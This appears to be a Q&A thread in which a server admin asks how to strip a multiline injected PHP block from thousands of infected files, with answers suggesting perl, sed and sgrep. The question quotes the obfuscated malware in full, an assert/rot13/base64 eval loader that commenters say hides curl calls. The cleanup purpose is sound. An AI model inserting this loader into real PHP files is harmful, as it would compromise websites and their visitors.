# Global multiline search & replace

Tags: sed, grep, filesystems, php, malware

I have a server with thousands of files containing a multi-line pattern that I want to globally find & replace.

Here's a sample of the pattern:

```
<div class="fusion-header-sticky-height"></div>
<div class="fusion-header">
        <div class="fusion-row">
                <?php avada_logo(); ?>
                <?php avada_main_menu(); ?>
        </div>
</div>


<?php
//###=CACHE START=###
@error_reporting(E_ALL);
@ini_set("error_log",NULL);
@ini_set("log_errors",0);
@ini_set("display_errors", 0);
@error_reporting(0);
$wa = ASSERT_WARNING;
@assert_options(ASSERT_ACTIVE, 1);
@assert_options($wa, 0);
@assert_options(ASSERT_QUIET_EVAL, 1);

$strings = "as"; $strings .= "se";  $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r";  $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
$light =  $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtMKWlo3WspzIjo3W0nJ5aXQNcBjccMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFxtrlOyL2uiVPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftsFOyoUAyVUfXWUIloPN9VPWbqUEjBv8ioT9uMUIjMTS0MKZhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKFxhVvMcCGRznQ0vYz1xAFtvZwSxLGVkAwqzBJEvBTSwAwV4ZwLkMGp3AQyvLJH1ZwDkZFVcBjccMvuzqJ5wqTyioy9yrTymqUZbVzA1pzksnJ5cqPVcXFO7PvEwnPN9VTA1pzksnJ5cqPtxqKWfXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK0uSDHESHvjtExSZH0HcB2A1pzksp2I0o3O0XPEwqKWfYPOQIIWZG1OHK0ACGx5SD1EHFH1SG1IHYPN1XGftL3IloS9mMKEipUDbWTA1pzjfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfXL3IloS9woT9mMFtxL2tcBjc9VTIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsDccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtoJD1XT1xAFtxK1WSHIISH1EoVaNvKFxcVQ09VPVkAwN0MwH5ZmxjZwp3ZGVlBGp1BJDjMQHkAGyzA2HkLvVcVUftMKMuoPumqUWcpUAfLKAbMKZbWS9FEISIEIAHJlWwVy0cXGftsDcyL2uiVPEcLaL7PtxWPK0tsD=="));'); $strings($light);
//###=CACHE END=###
?>
```

I've tried various methods to find and replace this string but its multiline nature has got me stumped. I've looked around extensively (over a day of searching) and the solutions I've found can't handle the multi-line nature of this.

Any assistance would be most welcome.

---

### UPDATE

I've got a solution now, largely thanks to the accepted answer.

Others facing something similar should [look at my github project for this](https://github.com/docdawning/searchAndDestroy).

Comment: The tool I would reach for is perl, with its easy to use ability to read in the whole file into a single string, do edits and write it back out. Is the "respectable" string the same in every infected file?

Comment: @icarus thankfully it is the same literal string in each file. I tried perl for this very briefly, I've never really used it, so maybe I'm due anyway.

Comment: Perhaps the simplest thing you can do is put the two lines you want to remove into a file on their own. Then replace everything in that file that is not alphanumeric by backslash and the character. Add a forward slash at the start of the line and a foward slash and `d` at the end. This file you can give to sed with a `-f`, and should have solved your quoting problems. Want this expanded into an answer?

Comment: wow, I just decoded the PHP, thats some lengths to obfuscate their curl calls. do you use vim? you could do a recursive grep for the strings, then write a macro and call it on every match?

Comment: actually I belive `curl` - and most other command line tools, `wget`,  and DNS lookup tools etc don't read `/etc/hosts` - only browsers do.

Comment: @the_velour_fog That actually depends on the resolver's configuration.

Comment: You could restore the files from backups.  However, neither editing nor restoring them would prevent your site from getting re-infected.  Just saying.

Comment: @satokatsura you're right that restore from backup is the 'right' answer. I have backups and everything is operated redundantly. But fixing this directly is a bit of a learning opportunity.

Comment: @the_velour_fog only browsers do not use my /etc/hosts, my /etc/hosts is used globally, and my web server runs as a fairly under priviledged user. Nevertheless, the upstream DNS server is also mine and I have it resolving this domain back to my own server as well, suffice to say, as soon as I did the hosts file edit, I could see captured traffic, so that does what I expect.

Comment: @icarus - putting the search string in a file is absolutely what I've been doing, only I haven't fed that file directly to sed, but instead read it in to variables (BASH) or Strings (Java). I have versions of the (multiline) search string that are fully escaped as well, so far no luck. Also, I'll add I'm not searching for two lines, but the entire injected PHP block, which is more like 15 lines.

Comment: ah  I was wondering if php's curl library read etc which would have been surprising. the way you would know that is if you -only- changed /etc/hosts and noticed the redirect. but since you changed upstream DNS and /etc/hosts how do you know it is reading etc hosts? but yes this is a side issue. if you posted more info about your search we could help, for example what you tried. I still dont see why matching a string is such a problem - is the string changing form?

Comment: @the_velour_fog - /etc/hosts is typically applied system-wide. This true everywhere, including macOS and even Windows. I noticed the redirections before I went further and altered my upstream DNS. The code does not change form, it's literally the same everywhere as far as I've seen. I agree it shouldn't be that hard and yet, I've sunk a lot of time in to it so far.

Comment: **Nuke it from orbit.**  Don't muck around with Perl.

Comment: It's solved and I didn't take the escape hatch. Levelled some skills. And I'll add that I really tried other solutions already but the nature of this multiline string was more than they could handle, therefore this isn't a dup, but you know, I can understand why it LOOKS like one. But it is sadly not.

Comment: Well, it's a dupe because the answer to all these questions is usually "don't try to fix it, restore from backup because you'll never be sure you found all of it". Also, just so you know, there is no reputation involved in closing questions so your accusations are unwarranted.

Comment: @terdon I've completely rephrased the question. The issue was never actually the malware. It was the problem of the global multiline search and replace. It should now be clearer.

Comment: @terdon For what it's worth, it's been several years since this incident and I've never seen a recurrence of this code. I still use that server too. So, I'm quite sure I got all of it. I think this question still has value, so I'm not going to close it.

Answer (score 3, accepted):

If you want to edit text defined by a [context-free language](https://en.wikipedia.org/wiki/Context-free_language) (nested matching begin and end tags, e.g. HTML or XML), you should use a tool made for that instead of a tool for [regular expressions](https://en.wikipedia.org/wiki/Regular_language).

Such a tool is for example [sgrep](https://www.cs.helsinki.fi/u/jjaakkol/sgrep.html) (available as a package for many linux distros): You can match (nested) regions defined by beginning and ending tags, and manipulate them. So for example

```
sgrep -o '%r\n' '(start .. end) extracting ("<?php".."?>" containing "###=CACHE START=###")'
```

will remove any region starting with `<?php` and ending with `?>` that contains `###=CACHE START=###` from your file, by printing all other regions separated by a newline. Newlines and white space are not considered relevant for matching, so multiline matches are for free.

Comment: Whilst true, I don't think this is helpful. The effort to write enough rules to say handle `?>` inside a string correctly will negate any advantage in being able to handle nested infections.

Comment: @icarus: You don't have to handle `?>` inside a string for this example, the code snippet that needs to be removed doesn't have `?>` inside a string. So I don't see the problem. That is, if I understood correctly that the whole sequence from CACHE START to CACHE END is the infection, and has to be removed. If only part of it needs to be removed, the question should be clarified.

Comment: I was responding to the first paragraph. If you are going to restrict the problem domain to the example then you only need literal string matching!

Comment: @icarus restricting the problem domain to literal matching is actually all I need in this case, as the injected code is entirely consistent. Thanks dirkt, I'll give this a whirl.

Comment: @dirkt I've tried this now, I've updated the question with where I'm at with it. Hopefully you can help a little more, there's much more info provided now.

Comment: @dirkt - spoke too soon. I got it going. Thank you massively. I'll update the question with my solution based on your answer and then accept your answer. Thanks a lot!